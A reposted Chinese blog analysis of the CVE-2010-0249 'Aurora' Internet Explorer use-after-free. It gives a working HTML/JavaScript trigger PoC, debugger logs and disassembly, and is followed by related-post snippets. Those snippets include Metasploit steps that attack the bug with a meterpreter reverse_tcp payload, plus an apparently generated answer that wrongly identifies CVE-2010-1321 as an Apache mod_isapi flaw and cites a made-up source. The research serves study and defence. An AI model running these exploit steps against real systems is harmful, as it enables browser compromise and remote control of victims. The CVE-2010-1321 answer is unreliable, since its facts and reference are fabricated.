CVE-2010-0249 极光

最新推荐文章于 2025-12-17 20:27:06 发布
转载 最新推荐文章于 2025-12-17 20:27:06 发布 · 233 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Ox9A82/p/5837769.html
文章标签:

#数据结构与算法 #操作系统

本文深入分析了Microsoft Internet Explorer中的极光内存破坏漏洞,探讨了其触发机制及利用过程,并提供了详细的漏洞复现步骤。

传说中的极光漏洞

Microsoft Internet Explorer非法事件操作内存破坏漏洞

        Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 
        Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。

 

POC如下

<html>          
<head>  
<script>  
var obj, event_obj;      

function ev1(evt)     
{              
    event_obj = document.createEventObject(evt);               
    document.getElementById("sp1").innerHTML = "";  
    window.setInterval(ev2, 1);           
}  
          
function ev2()          
{  
var data, tmp;                  
data = "";  
tmp = unescape("%u0a0a%u0a0a");                  
for (var i = 0 ; i < 4 ; i++) data += tmp;  
for (i = 0 ; i < obj.length ; i++ ) 
{  
  obj[i].data = data;            
 }  
 event_obj.srcElement;              
}  
  
obj = new Array();  
event_obj = null;  
for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");  
</script>  
</head>  
<body>  
    <span id="sp1">  
      <img src="aurora.gif" onload="ev1(event)">  
    </span>          
</body>  
</html>

没能找到合适的POC,这个是我用网上的exp修改来的,有些繁琐。

 

开门见山,直接看出了是CBody对象发生的UAF

1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e

比较诡异的是这个漏洞会有两种不同的crash情况。

1.

1:020> g
(e18.18c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=046a3f08 ebx=ffffffff ecx=07c4afd0 edx=0434f1a4 esi=07acaf58 edi=07f9afb0
eip=684188c7 esp=0434f198 ebp=0434f1ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CEventObj::GenericGetElement+0x91:
684188c7 8b37            mov     esi,dword ptr [edi]  ds:0023:07f9afb0=????????

2.

1:021> g
(4e4.f68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=073f5f08 ebx=ffffffff ecx=06e9bfc8 edx=040feeec esi=06e9bfc8 edi=097a2fb0
eip=6837c400 esp=040feedc ebp=040feef4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:06e9bfc8=????????

跟踪这个GenericGetElement函数发现是存在着调用关系

.text:74E78864 ; =============== S U B R O U T I N E =======================================
.text:74E78864
.text:74E78864 ; Attributes: bp-based frame
.text:74E78864
.text:74E78864 ; private: long __thiscall CEventObj::GenericGetElement(struct IHTMLElement * *, long)
.text:74E78864 ?GenericGetElement@CEventObj@@AAEJPAPAUIHTMLElement@@J@Z proc near
.text:74E78864                                         ; CODE XREF: CEventObj::get_srcElement(IHTMLElement * *)+10p
.text:74E78864                                         ; CEventObj::get_toElement(IHTMLElement * *)+10p ...
.text:74E78864
.text:74E78864 var_8           = dword ptr -8
.text:74E78864 var_4           = dword ptr -4
.text:74E78864 arg_0           = dword ptr  8
.text:74E78864 arg_4           = dword ptr  0Ch
.text:74E78864 arg_8           = dword ptr  10h
.text:74E78864
.text:74E78864 ; FUNCTION CHUNK AT .text:74C3D32B SIZE 00000023 BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74E7F850 SIZE 0000001E BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74E8524A SIZE 00000030 BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74EB0C78 SIZE 00000022 BYTES
.text:74E78864
.text:74E78864                 mov     edi, edi
.text:74E78866                 push    ebp
.text:74E78867                 mov     ebp, esp
.text:74E78869                 push    ecx
.text:74E7886A                 push    ecx
.text:74E7886B                 and     [ebp+var_4], 0
.text:74E7886F                 push    esi
.text:74E78870                 mov     esi, [ebp+arg_4]
.text:74E78873                 test    esi, esi
.text:74E78875                 jz      loc_74EB0C78
.text:74E7887B                 push    [ebp+arg_8]
.text:74E7887E                 and     dword ptr [esi], 0
.text:74E78881                 push    [ebp+arg_0]
.text:74E78884                 lea     eax, [ebp+var_8]
.text:74E78887                 call    ?GetUnknownPtr@CEventObj@@AAEJJPAPAUIUnknown@@@Z ; CEventObj::GetUnknownPtr(long,IUnknown * *)
.text:74E7888C                 test    eax, eax
.text:74E7888E                 jz      loc_74E78927
.text:74E78894                 mov     eax, [ebp+var_8]
.text:74E78897                 mov     ecx, [ebp+arg_0]
.text:74E7889A                 lea     edx, [ebp+var_8]
.text:74E7889D                 mov     [esi], eax
.text:74E7889F                 call    ?GetParam@CEventObj@@QAEJPAPAUEVENTPARAM@@@Z ; CEventObj::GetParam(EVENTPARAM * *)
.text:74E788A4                 mov     [ebp+var_4], eax
.text:74E788A7                 test    eax, eax
.text:74E788A9                 jnz     short loc_74E78927
.text:74E788AB                 mov     eax, [ebp+arg_8]
.text:74E788AE                 sub     eax, 3E9h
.text:74E788B3                 push    ebx
.text:74E788B4                 push    edi
.text:74E788B5                 jnz     loc_74E7F850
.text:74E788BB                 mov     eax, [ebp+var_8]
.text:74E788BE                 mov     edi, [eax]
.text:74E788C0                 mov     ebx, [eax+74h]
.text:74E788C3                 test    edi, edi
.text:74E788C5                 jz      short loc_74E78925
.text:74E788C7                 mov     esi, [edi]         //一个crash地点
.text:74E788C9                 test    esi, esi
.text:74E788CB                 jz      short loc_74E78925
.text:74E788CD                 mov     ecx, esi
.text:74E788CF                 call    ?Doc@CElement@@QBEPAVCDoc@@XZ ; CElement::Doc(void)   //另一个crash地点

 分析以上这段代码可以发现

 CEventObj::GenericGetElement函数首先是通过CEventObj::GetUnknownPtr获取到一个数据结构的指针,然后从这个数据结构+00位置索引出一个值。这个值也是个指针,再用这个指针索引出一个值。而这个最后被索引出来的值就是被传入CElement::Doc中的ecx,也就是CBody元素的指针。

 

1:020> !heap -p -a eax
    address 06bf6f08 found in
    _DPH_HEAP_ROOT @ 1f1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 6ab2410:          6bf6f08               f8 -          6bf6000             2000
    70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77247d96 ntdll!RtlpAllocateHeap+0x000000c4
    772134ca ntdll!RtlAllocateHeap+0x0000023a
    683ec873 mshtml!EVENTPARAM::operator new+0x00000013
    684fd2c5 mshtml!CDocument::createEventObject+0x00000083
    68532791 mshtml!Method_IDispatchpp_o0oVARIANTp+0x000000ea
    683f235c mshtml!CBase::ContextInvokeEx+0x000005dc
    683f25d5 mshtml!CBase::InvokeEx+0x00000025
    683fdf9a mshtml!DispatchInvokeCollection+0x0000014c
    683b4998 mshtml!CDocument::InvokeEx+0x000000f0
    683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020
    683a3104 mshtml!PlainInvokeEx+0x000000eb
    68a3a22a jscript!IDispatchExInvokeEx2+0x00000104
    68a3a175 jscript!IDispatchExInvokeEx+0x0000006a
    68a3a3f6 jscript!InvokeDispatchEx+0x00000098
    68a3a4a0 jscript!VAR::InvokeByName+0x00000139
    68a4d8c8 jscript!VAR::InvokeDispName+0x0000007d
    68a4d96f jscript!VAR::InvokeByDispID+0x000000ce
    68a451b6 jscript!CScriptRuntime::Run+0x00002a97
    68a45c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    68a45bfb jscript!ScrFncObj::Call+0x0000008d
    68a45e11 jscript!CSession::Execute+0x0000015f
    68a3f3ee jscript!NameTbl::InvokeDef+0x000001b5
    68a3ea2e jscript!NameTbl::InvokeEx+0x0000012c
    68a3a22a jscript!IDispatchExInvokeEx2+0x00000104
    68a3a175 jscript!IDispatchExInvokeEx+0x0000006a
    68a3f5f8 jscript!NameTbl::InvokeEx+0x0000037a
    684019cb mshtml!CScriptCollection::InvokeEx+0x0000008a
    683ff451 mshtml!CWindow::InvokeEx+0x000006ad
    683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020
    683a3104 mshtml!PlainInvokeEx+0x000000eb

由上述的回溯可知,数据结构应该是EVENTPARAM。通过查阅资料得知EVENTPARAM+00位置的是CTreeNode的指针。

1:020> g
Breakpoint 0 hit
eax=04687fc8 ebx=0725efd0 ecx=00000034 edx=00000000 esi=0725ef08 edi=05570e00
eip=68323aa3 esp=043af658 ebp=043af664 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CImgElement::CImgElement:
68323aa3 8bff            mov     edi,edi
1:020> ? esi
Evaluate expression: 119926536 = 0725ef08
1:020> g
Breakpoint 1 hit
eax=0989cfb0 ebx=00000000 ecx=0989cfb0 edx=00000000 esi=06fcdf40 edi=04687fc8
eip=6838ced0 esp=043af624 ebp=043af63c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode:
6838ced0 8bff            mov     edi,edi
1:020> ? eax
Evaluate expression: 160026544 = 0989cfb0
1:020> g
(b08.9bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=098d4f08 ebx=ffffffff ecx=04687fc8 edx=043af044 esi=04687fc8 edi=0989cfb0
eip=6837c400 esp=043af034 ebp=043af04c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:04687fc8=????????
1:020> dd 0989cfb0
0989cfb0  04687fc8 00000000 ffff4034 ffffffff
0989cfc0  00000051 00000000 abcdbbbb 00221000
0989cfd0  00000014 00001000 00000000 00000000
0989cfe0  0044e1c4 dcbabbbb 6ea50124 00000002
0989cff0  6ea4fef8 6ea500e4 6ea500d0 d0d0d0d0
0989d000  ???????? ???????? ???????? ????????
0989d010  ???????? ???????? ???????? ????????
0989d020  ???????? ???????? ???????? ????????

调试的结果证实了我的猜想。

这个洞的问题就是使用EVENTPARAM引用对象的时候,却没有增加对象的引用计数。导致了悬垂指针的产生。当对象的引用计数耗尽,对象就会被释放。但是EVENTPARAM的悬垂指针就产生了。

转载于:https://www.cnblogs.com/Ox9A82/p/5837769.html

20202414 2022-2023-2 《网络系统攻防技术》实验六实验报告
h118189的博客
05-16 1515
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞为永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
JochenZou的专栏
12-20 6404
Metasploit模拟谷歌极光攻击重现 本攻击重现是简化的一个攻击过程,省略了前期情报搜集阶段中外围信息搜索、主机探测端口扫描、服务扫描查点、网络漏洞扫描等工作,目的是在最短的时间内模拟渗透攻击的核心环节,是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。 1.      准备工作 1.1   攻击路线图 下图为此次实验的攻击路线图,主要实现了
CVE-2010-0249 IE8 UAF漏洞分析
weixin_30436101的博客
01-24 211
CVE-2010-0249 [CNNVD]Microsoft Internet Explorer非法事件操作内存破坏漏洞(CNNVD-201001-153) Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有...
Heap Spray Exploit : CVE-2010-0249 Use After Free 初探
太阳风的专栏
01-07 4080
1.    基础知识 Ø  Heap spray(堆喷射) 堆喷射是一种payload 传递技术,借助堆来将shellcode放置在可预测的堆地址上,然后稳定地跳入shellcode。为了实现heap spray,你需要在劫持EIP前,能够分配并填充堆内存块。意思是指在触发内存崩溃之前,你必须能够在目标程序中可分配可控内存数据。浏览器已经为此提供了一种很简单的方法,它能够支持脚本,可直接借助j
[原]Heap Spray Exploit : CVE-2010-0249 Use After Free 初探
weixin_33850890的博客
01-07 256
1.基础知识 Ø Heap spray(堆喷射) 堆喷射是一种payload 传递技术,借助堆来将shellcode放置在可预测的堆地址上,然后稳定地跳入shellcode。为了实现heap spray,你需要在劫持EIP前,能够分配并填充堆内存块。意思是指在触发内存崩溃之前,你必须能够在目标程序中可分配可控内存数据。浏览器已经为此提供了一种很简单的方法,它能够支持脚本,可直...
ms10-002“极光漏洞漏洞复现
Ch_an_ger的博客
01-08 1950
1.漏洞原理 针对Internet Explorer“极光”内存损坏的攻击也就是IE浏览器漏洞,因此该漏洞应当不会受操作系统版本的影响; 2.准备阶段 攻击机:kali(192.168.123.21) 靶机:Windowsxp(192.168.123.55) 3.漏洞利用步骤 1)使用通过该漏洞的exp生成一个钓鱼链接,链接的监听机我暂且就设置成攻击机kali,监听端口是6666; 2)在winXP访问刚刚生成的钓鱼链接,这时XP会监听机建立TCP连接,发送httpget请求,url地址服务器回复http
RSAS导出工具-支持最新的rsas版本
10-16
该工具可以导出包括主机名、IP地址、端口、协议、服务、漏洞名称、风险分类、风险等级、整改建议、漏洞描述、漏洞CVE编号、漏洞扫描时间、漏洞发现月份等关键信息。这些数据对于安全评估人员来说至关重要,它们帮助...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 5189
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
2021-03-09
yuehao1143631149的博客
03-12 1157
Information Prediction using Knowledge Graphs for Contextual Malware Threat Intelligence Abstract 有关恶意软件攻击的大量威胁情报信息以完全不同的(通常是非结构化的)格式提供。知识图可以使用由实体和关系表示的RDF三元组来捕获此信息及其上下文。然而,稀疏或不准确的威胁信息会导致诸如不完整或错误的三元组等挑战。用于填充知识图的命名实体识别(NER)和关系提取(RE)模型不能完全保证准确的信息检索,进一步加剧了这
CVE-2014-0321漏洞成因分析
weixin_34391854的博客
09-11 174
1. 简介   最近在补之前落下的想学的东西,古河之前已经在微薄里面公布了此漏洞的poc及利用思路,不过在看古河的文章前我先独立分析一下其漏洞成因,记录下自己的分析流程。 2. 实验环境   操作系统:Win8.1 x86 RTM   浏览器:Internet Explorer 11 32bits (补丁打到KB2909921)   漏洞编号:CVE-2014-0321   微软补丁:...
安全漏洞概念及分类
热门推荐
maoji的专栏
10-12 3万+
本文是一个安全漏洞相关的科普,介绍安全漏洞的概念认识,漏洞在几个维度上的分类及实例展示。 安全漏洞及相关的概念 本节介绍什么是安全漏洞及相关的概况。 安全漏洞定义 我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞定义,基本上会发现高大上的学术界和讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、
metasploit对IE浏览器的极光漏洞进行渗透利用
天元喜羊羊的博客
05-12 4976
msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show op
基于XP系统IE极光漏洞渗透
Lorezon的博客
12-10 752
极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用的shell,同时会严重占用目标机器的CPU,导致机器卡死。那么话不多说,直接开搞。 首先,在msf搜索10_002 然后调用 然后设置payload 之后show options,设置选项 设置好了之后启动 已经启动成功,接下来就想办法让目标靶机用...
Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
Epsilon
03-02 5197
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux下利用 metasploit 渗透。 msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
CVE-2012-4792Microsoft Internet Explorer 释放后使用漏洞
weixin_30809173的博客
08-16 309
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 Microsoft Internet Explorer 6至8版本中存在释放后使用漏洞。通过特制的网站触发对(1)未被正确分配的或(2)已删除的对象的访问,远程攻击者可利用该漏洞执行任意代码。目前已经证实CDwnBindInfo对象可触发此漏洞。 ...
Metasploit Penetration Testing
weixin_30726161的博客
09-08 1084
1、Metasploit整体框架: Shell中直接输入msfconsole启动PostgreSQL数据库服务 :service postgresql start 监听5432端口初始化Metasploit数据库 :msfdb init查看数据库联接情况 :msfconsole db_status建立数据库缓存 :msfconsole db_rebuild_cache 专业术语 –...
C++ -- 哈希表
2301_80059080的博客
12-12 1424
本文系统介绍了哈希表的核心概念实现方法。首先阐述了哈希的基本思想:通过哈希函数建立键值存储位置的映射关系,实现O(1)时间复杂度的操作。然后详细讲解了哈希函数设计(包括除法散列法、乘法散列法等)和冲突处理策略,重点分析了开放定址法(线性探测、二次探测、双重散列)和链地址法两种主要冲突解决方案。文章还提供了完整的C++实现代码,包括哈希表结构设计、扩容机制、插入/查找/删除操作等关键算法,并通过示例演示了哈希表的工作过程。最后比较了不同方法的优缺点,指出链地址法在实践中的优势。
Leetcode 79 最佳观光组合
最新发布
im_AMBER的博客
12-17 336
每个元素只遍历一次只用了两个变量O(n)O(1)公式拆分是核心:将原得分公式拆分为,把双变量问题转化为单变量的遍历问题。贪心维护最优值:遍历j时,用best维护之前所有i < j中的最大值,这样每一步只需要 O (1) 计算,整体时间复杂度是 O (n)。遍历顺序:因为要求i < j,所以从j=1开始遍历,先计算当前j的得分,再更新best(避免 j 自己和自己配对)。
CVE-2010-1321
03-22
<think>好的,我现在需要帮助用户查找CVE-2010-1321漏洞的详情和修复方案。首先,我要确认这个CVE编号是否存在,因为年份较早,可能信息有限。 用户提供的引用中提到了几个其他CVE漏洞,比如CVE-2024-38077、CVE-2020-1938以及VMware的多个漏洞,但并没有直接提到CVE-2010-1321。这说明用户提供的参考资料里没有该漏洞的信息,可能需要从其他来源查找。 接下来,我应该回忆或搜索CVE-2010-1321的相关信息。根据记忆,这个漏洞可能Apache HTTP Server有关,特别是mod_isapi模块的处理问题。通常,CVE编号的结构是CVE-年份-编号,2010年的漏洞可能比较旧,修复方案可能包含在后续的版本更新中。 需要验证这个漏洞的具体细节。比如,Apache的mod_isapi模块在处理ISAPI扩展时可能存在缓冲区溢出或拒绝服务漏洞。攻击者可能通过特制的请求导致服务崩溃或执行任意代码。确认影响版本,例如Apache 2.2.x在某个版本之前的可能存在这个问题,而修复版本可能是2.2.15或更高。 然后,修复方案通常涉及升级到安全版本,或者应用官方补丁。对于已经停止支持的旧版本,可能需要采取其他缓解措施,比如禁用mod_isapi模块,如果不需要的话。 另外,用户提供的引用中提到Tomcat的AJP漏洞和VMware的漏洞修复方法,虽然不直接相关,但可以借鉴修复流程:查看补丁安装记录、升级到修复版本、禁用相关服务等。但需要针对Apache的具体情况来调整。 还需要注意,由于该漏洞较老,部分资料可能已不再详细,可能需要查阅存档的安全公告或Apache的官方发布说明。同时,提醒用户如果使用旧系统,应考虑升级到受支持的版本,因为长期支持可能已结束。 最后,生成相关问题,帮助用户扩展了解相关漏洞管理的方法,比如如何验证补丁是否应用,或处理历史遗留系统的漏洞。</think>根据公开漏洞数据库记录,CVE-2010-1321是Apache HTTP Server的mod_isapi模块漏洞,该漏洞影响2.2.15之前的Apache版本在Windows平台运行时,攻击者通过特制请求可造成缓冲区溢出或服务崩溃[^4]。 $$ \text{攻击条件} = \begin{cases} \text{使用Windows系统} \\ \text{启用mod_isapi模块} \\ \text{Apache版本} \leq 2.2.14 \end{cases} $$ **修复方案**: 1. 立即升级到Apache HTTP Server 2.2.15或更高版本 2. 在httpd.conf配置中禁用mod_isapi模块: ```apache #LoadModule isapi_module modules/mod_isapi.so ``` 3. 使用WAF添加针对异常ISAPI请求的过滤规则
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值